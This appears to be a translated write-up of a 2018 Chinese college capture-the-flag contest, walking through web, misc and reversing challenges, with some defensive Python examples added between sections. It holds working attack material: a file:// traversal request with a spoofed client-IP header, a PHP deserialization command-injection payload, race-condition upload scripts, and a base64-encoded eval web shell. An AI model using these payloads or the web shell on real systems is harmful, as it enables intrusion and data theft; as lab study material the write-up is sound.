2018 "骇极杯" National College Student Cyber Security Invitational and the 4th Shanghai College Student Network

Author: 灰羽小少爷 | Source: published 2018-11-05 17:03, 65 reads

    Preface: lately I have been going back through the top players' write-ups and reproducing the challenges, so this post will keep being updated.

    A very rough table of contents:

    WEB-1 [no reproduction needed]
    WEB-2 [no reproduction needed]
    WEB-3 [no reproduction needed]
    WEB-4 [not reproduced yet]
    aessss [not reproduced yet]
    rsaaaa [not reproduced yet]
    92 [reproduction updated 2018-11-5 20:27]
    easy_py [no reproduction needed]
    N0find [not reproduced yet]
    baby_arm [not reproduced yet (still setting up the environment...)]
    memo__server [not reproduced yet]
    cpp [waiting to reproduce and write a detailed WP]
    cyvm [not reproduced yet]
    What's_it [not reproduced yet]

    WEB-1

    Challenge: what are you doing?

    Visiting the web1 link shows "what are you doing?". The usual first step is to look at the page source, which points to robots.txt:

    what are you doing?<br /> <!--  you need to visit to robots.txt  -->
    

    robots.txt lists two PHP files:

    source.php
    flag.php
    

    flag.php is a blank page, and source.php responds with "you need to login as admin!". Looking at the source of source.php:

    you need to login as admin!<!-- post param  'admin' -->
    

    So we need to log in as admin: POST admin=1.

    you need to login as admin!<!-- post param  'admin' -->only 127.0.0.1 can get the flag!!
    

    The request has to come from 127.0.0.1, so we add the header x-client-ip:127.0.0.1 and send the request again.

    you need to login as admin!<!-- post param  'admin' -->you need post url: http://www.ichunqiu.com
    

    Following the hint we POST the url parameter; the response contains an image address, but the image does not display. Downloading it shows it is actually HTML: the i春秋 homepage.

    We were stuck here for quite a while. With url=https://www.ichunqiu.com plus a path, the server returns the page source at that path, so we tried assembling a URL to download the source of flag.php, but none of the concatenations worked. A teammate eventually thought of jumping straight through the directory tree to the local file flag.php; the "image" that comes back is then the source of flag.php. The payload:

    POST /source.php HTTP/1.1
    Host: a5c3e1b00225407882f0c49146799bc7264bdbab35e64bc6.game.ichunqiu.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    x-client-ip:127.0.0.1
    Referer: http://a5c3e1b00225407882f0c49146799bc7264bdbab35e64bc6.game.ichunqiu.com/source.php
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 63
    Connection: keep-alive
    Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1541299543; UM_distinctid=16554da401239b-0683daa189f84b-4c312878-144000-16554da401358; pgv_pvi=8097842176; ci_session=b34f5f4fa25e7d36b3c6f0d3efae40f090604014; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; pgv_si=s5565527040; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1541318560; Hm_lvt_9104989ce242a8e03049eaceca950328=1541299549; Hm_lpvt_9104989ce242a8e03049eaceca950328=1541299549; Hm_lvt_1a32f7c660491887db0960e9c314b022=1541299549; Hm_lpvt_1a32f7c660491887db0960e9c314b022=1541299549
    Upgrade-Insecure-Requests: 1
    
    admin=1&url=file://www.ichunqiu.com/../../var/www/html/flag.php
    
    Finally, rename the downloaded image to a .php file and we have the flag:

    <?php
    $flag="flag{2ca93a96-39e3-48c9-9377-fd79a9f1c40b}";
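
Two checks were bypassed in this challenge: an "only 127.0.0.1" check that trusted the client-supplied x-client-ip header, and a URL check that accepted file://www.ichunqiu.com/../../var/www/html/flag.php because the expected hostname appeared in it. As an added example (not the write-up's or the challenge's code; the allowlist and function names are assumptions), here is how a fetcher should validate the URL by parsing it, and how the client address should be taken from the socket instead of a header:

```python
import ipaddress
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_HOSTS = {"www.ichunqiu.com"}     # assumed allowlist for this example

CHALLENGE_PAYLOAD = "file://www.ichunqiu.com/../../var/www/html/flag.php"

def naive_check(url: str) -> bool:
    """A substring check like the one the challenge appears to use:
    it passes as soon as the expected host appears anywhere in the URL."""
    return "www.ichunqiu.com" in url

def safe_fetch_url(url: str) -> bool:
    """Parse the URL and require an allowed scheme, an exact host match,
    no userinfo or odd ports, and no '..' path components."""
    try:
        parts = urlparse(url)
        scheme = parts.scheme.lower()
        host = parts.hostname
        port = parts.port          # raises ValueError on a malformed port
    except ValueError:
        return False
    if scheme not in ALLOWED_SCHEMES:
        return False               # rejects file://, gopher://, ...
    if host is None or host.lower() not in ALLOWED_HOSTS:
        return False               # exact host, not a substring match
    if parts.username or parts.password or port not in (None, 80, 443):
        return False               # blocks http://www.ichunqiu.com@evil.example/
    if ".." in parts.path.split("/"):
        return False               # no traversal, even before the server resolves it
    return True

def is_local_client(remote_addr: str) -> bool:
    """The loopback check must use the socket peer address; headers such as
    x-client-ip or X-Forwarded-For are set by the client and prove nothing."""
    try:
        return ipaddress.ip_address(remote_addr).is_loopback
    except ValueError:
        return False
```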
    

    WEB-2

    Challenge: Can you hack me?

    This challenge is a leaked .swp file; we download it and audit the source.

    The .swp file is recovered on Linux with vi -r index.php.swp.

    Then the code audit begins...

    <?php
    error_reporting(0);
    class come{
        private $method;
        private $args;
        function __construct($method, $args) {
            $this->method = $method;
            $this->args = $args;
        }
        // runs on unserialize(): every argument goes through waf()
        function __wakeup(){
            foreach($this->args as $k => $v) {
                $this->args[$k] = $this->waf(trim($v));
            }
        }
        // blacklist filter: strips a few characters and removes 'flag' in a single pass
        function waf($str){
            $str=preg_replace("/[<>*;|?\n ]/","",$str);
            $str=str_replace('flag','',$str);
            return $str;
        }
        // the argument is interpolated straight into a shell command
        function echo($host){
            system("echo $host");
        }
        // runs when the object is destroyed: calls $this->echo() with the filtered args
        function __destruct(){
            if (in_array($this->method, array("echo"))) {
                call_user_func_array(array($this, $this->method), $this->args);
            }
        }
    }
    $first='hi';
    $var='var';
    $bbb='bbb';
    $ccc='ccc';
    $i=1;
    // only the first GET parameter is turned into a variable
    foreach($_GET as $key => $value) {
            if($i===1)
            {
                $i++;
                $$key = $value;
            }
            else{break;}
    }
    if($first==="doller")
    {
        // parse_str() registers var, bbb and ccc from the 'a' parameter
        @parse_str($_GET['a']);
        if($var==="give")
        {
            if($bbb==="me")
            {
                if($ccc==="flag")
                {
                    echo "<br>welcome!<br>";
                    $come=@$_POST['come'];
                    unserialize($come);
                }
            }
            else
            {echo "<br>think about it<br>";}
        }
        else
        {
            echo "NO";
        }
    }
    else
    {
        echo "Can you hack me?<br>";
    }
    ?>
    

    From the code, we first have to get past the GET-parameter checks before reaching unserialize: only the first GET parameter becomes a variable, and parse_str on the a parameter supplies var, bbb and ccc. The GET bypass:

    ?first=doller&a=var%3dgive%26bbb%3dme%26ccc%3dflag
    

    Next, getting past the deserialization filter. From the code, __wakeup runs a waf that strips characters. The first idea, found via Google, was CVE-2016-7124: when the property count in the serialized string is larger than the real number of properties, __wakeup is skipped. That worked locally but not on the remote target... Annoying. Back to the code: the waf does not filter slashes, and spaces can be replaced with $IFS. Reference links consulted:

    https://www.knowsec.net/archives/341/

    https://blog.csdn.net/qq_42196196/article/details/81217375?utm_source=blogkpcl1

    The resulting payload:

    POST /?first=doller&a=var%3dgive%26bbb%3dme%26ccc%3dflag HTTP/1.1
    Host: f927629d24dd4e0b84ef5e917d89dba041b03b9deb3641d9.game.ichunqiu.com
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 127
    
    come=O:4:"come":2:{s:12:"%00come%00method";s:4:"echo";s:10:"%00come%00args";a:2:{i:0;s:18:"`cat$IFS/flflagag`";i:1;s:3:"hjj";}}
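
The waf() in the leaked source is a blacklist: it strips a few characters and removes the string flag exactly once, which is why the argument `cat$IFS/flflagag` comes out of it as a working command. As an added example (not the write-up's or the challenge's code; the allowlist pattern is an assumption), the filter re-implemented in Python next to the defensive alternative: validate the argument against an allowlist and pass it to the program as an argv element instead of through a shell string like system("echo $host"):

```python
import re
import subprocess
from typing import Optional

BYPASS_INPUT = "`cat$IFS/flflagag`"   # the first args element from the write-up's payload

def challenge_waf(s: str) -> str:
    """Re-implementation of the leaked waf(): trim, strip < > * ; | ? newline
    and space, then remove the literal 'flag' in a single, non-recursive pass."""
    s = re.sub(r"[<>*;|?\n ]", "", s.strip())
    return s.replace("flag", "")

ARG_RE = re.compile(r"[A-Za-z0-9_.-]{1,64}")   # assumed allowlist for a host argument

def allowlist_check(s: str) -> bool:
    """Accept only a short token of unambiguous characters; anything else is
    rejected outright instead of being 'cleaned'."""
    return ARG_RE.fullmatch(s) is not None

def safe_echo(host: str) -> Optional[str]:
    """Fix for system("echo $host"): validate first, then run echo with an argv
    list and no shell, so the argument can never be parsed as a command."""
    if not allowlist_check(host):
        return None
    result = subprocess.run(["echo", host], capture_output=True, text=True, check=True)
    return result.stdout.rstrip("\n")
```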
    
    

    WEB-3

    Opening the challenge, the source is given directly.

    Race-condition shell upload: upload the file repeatedly from many threads and win the race.

    poc1

    import threading
    import requests

    def send(num):
        url = "http://1f59ccd88b9d491db1b14abc6ff8642bbb50265d149e41f1.game.ichunqiu.com/"
        # url = "http://web3.shb.5am3"
        file_name = "file"
        file_upload_name = "5am3.php"
        f = open("5am3.php", "rb")          # the PHP file to upload (its content starts with '@')
        data = {
            "file[1]": "aaa",
            "file[]": "php",
            "hehe": "http://test2.5am3.com/test.php"
        }
        file = {
            file_name: (file_upload_name, f),
        }
        try:
            req = requests.post(url, data, files=file)
            # print(req.text)
            if "@" in req.text:             # the '@' from the uploaded file appears in the response
                print("crack ok!")
        except Exception as e:
            print("1")
        finally:
            f.close()

    def crack(threadNumber=5):
        threads = []
        for num in range(120, 121):
            threads.append(threading.Thread(target=send, args=(num,)))
        for thread in threads:
            thread.start()
            while True:                      # keep at most threadNumber threads alive
                if len(threading.enumerate()) < threadNumber:
                    break

    while 1:
        crack()
    # send(111)
    

    poc2

    import threading
    import requests

    def send(num):
        url = "http://1f59ccd88b9d491db1b14abc6ff8642bbb50265d149e41f1.game.ichunqiu.com/"
        # url = "http://web3.shb.5am3"
        file_name = "file"
        file_upload_name = "5am3.php"
        f = open("5am32.php", "rb")         # the PHP file to upload
        data = {
            "file[1]": "aaa",
            "file[]": "php",
            "hehe": str(num) + ".php"        # target name varies with the thread number
        }
        file = {
            file_name: (file_upload_name, f),
        }
        try:
            req = requests.post(url, data, files=file)
            # print(req.text)
            if "@" in req.text:             # the '@' from the uploaded file appears in the response
                print("crack ok!")
        except Exception as e:
            print("1")
        finally:
            f.close()

    def crack(threadNumber=20):
        threads = []
        for num in range(100, 900):
            threads.append(threading.Thread(target=send, args=(num,)))
        for thread in threads:
            thread.start()
            while True:                      # keep at most threadNumber threads alive
                if len(threading.enumerate()) < threadNumber:
                    break

    while 1:
        crack()
    # send(111)
    

    payload:

    POST / HTTP/1.1
    Host: 1f59ccd88b9d491db1b14abc6ff8642bbb50265d149e41f1.game.ichunqiu.com
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:62.0) Gecko/20100101 Firefox/62.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Referer: http://web3.shb.5am3/
    Content-Type: multipart/form-data; boundary=---------------------------21022237801674110016436295918
    Content-Length: 1107
    Connection: close
    Upgrade-Insecure-Requests: 1
    
    -----------------------------21022237801674110016436295918
    Content-Disposition: form-data; name="file"; filename="5am3.php"
    Content-Type: text/php
    
    @<?php 
    $file = 'config.php';
    $code = base64_decode('QDw/cGhwCiAgICBpZihtZDUoJF9QT1NUWydwYXNzJ10pPT0iNGViZDM5N2QzZWU2NmMyMTBlM2RjNWYzYWNmOGQ5YzMiKSBldmFsKCRfUE9TVFsna24wY2snXSk7Cj8+CiAgICAgICAgICAgIAogICAg');
    file_put_contents($file, $code);
    ?>
    -----------------------------21022237801674110016436295918
    Content-Disposition: form-data; name="file[1]"
    
    sssss.asd
    -----------------------------21022237801674110016436295918
    Content-Disposition: form-data; name="file[]"
    
    php
    -----------------------------21022237801674110016436295918
    Content-Disposition: form-data; name="hehe"
    
    /var/sandbox/2765d621af8a58b78b4d528bd5ef7f6b/config.php
    -----------------------------21022237801674110016436295918
    Content-Disposition: form-data; name="pass"
    
    5am3
    -----------------------------21022237801674110016436295918
    Content-Disposition: form-data; name="kn0ck"
    
    system("cat /flag");
    -----------------------------21022237801674110016436295918--
    
    

    MISC - easy_py

    The pyc file structure can be analyzed with 010 Editor and exported to a CSV. After a little formatting, fill in the Value column from the variable list that 010 detects automatically and infer the actual Python code from it; from that, infer the program's encryption logic and write the decryption program.

    #include <iostream>
    using namespace std;

    int main()
    {
        // fill in with the 15 encrypted bytes recovered from the pyc
        int cmp[15]={};
        int q=0;
        for(int i=0;i<15;i++)
        {
            for(int j=0;j<256;j++)   // try every byte value
            {
                // ((~j)&102)|(j&(-103)) is j XOR 102; the outer parentheses are
                // required because == binds tighter than |
                if(cmp[q] == (((~j)&102)|(j&(-103))))
                {
                    q=q+1;
                    cout<<(char)j;
                    break;
                }
            }
        }
        return 0;
    }
    

    That is how the decryption script above was written.
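
The expression in the brute-force loop, ((~j)&102)|(j&(-103)), is XOR with 102 in disguise: -103 is ~102, so the first term keeps the bits of ~j where 102 has a 1 and the second keeps the bits of j where 102 has a 0. As an added example (not the write-up's script; the sample plaintext is constructed), a Python decoder that recovers each byte the same way the C++ loop does and checks it against the direct XOR:

```python
def encode_byte(j: int) -> int:
    """The transform recovered from the pyc, exactly as written in the C++ loop."""
    return ((~j) & 102) | (j & (-103))

def decode_bruteforce(cipher: bytes) -> bytes:
    """Mirror the C++ approach: for each ciphertext byte try every j in 0..255
    until encode_byte(j) matches; fail loudly if no byte maps to it."""
    out = bytearray()
    for c in cipher:
        for j in range(256):
            if encode_byte(j) == c:
                out.append(j)
                break
        else:
            raise ValueError("no preimage for byte %d" % c)
    return bytes(out)

def decode_direct(cipher: bytes) -> bytes:
    """Because the transform is j XOR 102, applying it again undoes it."""
    return bytes(c ^ 102 for c in cipher)

SAMPLE_PLAINTEXT = b"constructed_sample"                     # constructed for this example
SAMPLE_CIPHER = bytes(encode_byte(b) for b in SAMPLE_PLAINTEXT)
```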

    cpp

    Reversing shows that the flag goes through two layers of encryption; since the amount of computation is small, it can be solved directly by brute force.

    Final flag: flag{W0w_y0u_m4st3r_C_p1us_p1us}

    92

    Opening the file reveals a huge pile of characters.

    Scrolling to the bottom, we find D0CF11E0 (the DOC file header), so we infer that the rows need to be put back in order; Excel is used for that.

    (First set the cell format to numeric, then insert sequence numbers in column A (auto-fill is strongly recommended), sort, and copy the result back.)

    Paste into HxD and save as a .doc; opening it asks for a password!

    Next we notice that the last few characters of the first row are a reversed PNG header (74E40598).

    Script to reverse each row:

    file_read = open("/home/xiaolan/Desktop/get.txt", 'r+')
    file_write = open("/home/xiaolan/Desktop/out.txt", 'a+')
    for i in range(229893):
        # each hex row is 32 characters: read it, reverse it, append it to the output
        str_1 = file_read.readline(32)
        file_write.writelines(str_1[::-1])
    file_read.close()
    file_write.close()
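
The script above reverses each 32-character hex row; the 74E40598 at the end of the first row is 89504E47 (the bytes 89 'P' 'N' 'G') written backwards. As an added example (not the write-up's script; the input rows are constructed), a function that applies the same per-row reversal in memory, decodes the hex, and confirms the PNG signature before anything is written to disk:

```python
PNG_SIGNATURE = bytes.fromhex("89504E470D0A1A0A")

def reverse_rows(text: str) -> str:
    """Reverse every non-empty hex row on its own, as the write-up's script does,
    and join the rows back into a single hex string."""
    return "".join(line.strip()[::-1] for line in text.splitlines() if line.strip())

def recover_png(text: str) -> bytes:
    """Decode the reversed hex and insist on a PNG signature before the result
    is trusted or written out."""
    data = bytes.fromhex(reverse_rows(text))
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("reversed data does not start with a PNG signature")
    return data

# Constructed sample: the real file's rows are 32 hex characters each and the first
# row ends in 74E40598. These two rows, once reversed, give the 8-byte PNG signature
# followed by the start of an IHDR chunk (length 13, type "IHDR", 16x16, RGBA).
ORIGINAL_HEX_ROWS = [
    "89504E470D0A1A0A0000000D49484452",
    "00000010000000100806000000000000",
]
SAMPLE_ROWS = "\n".join(row[::-1] for row in ORIGINAL_HEX_ROWS)   # as they appear in get.txt
```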
    

    This yields a PNG file:

    Scanning it gives >:2?kEaX

    Decoding that gives the doc password: Passwd

    Opening the document shows:

    Scanning again:

    gives flag{XXXX+XXXX+stlganography}

    Moving the QR code aside reveals:

    flag{M1sc_+XXXX+stlganography}

    Then decrypt the image:

    which gives the flag:

    flag{M1sc_Off1c1_stlganography}

      Article link: https://www.haomeiwen.com/subject/zfgsxqtx.html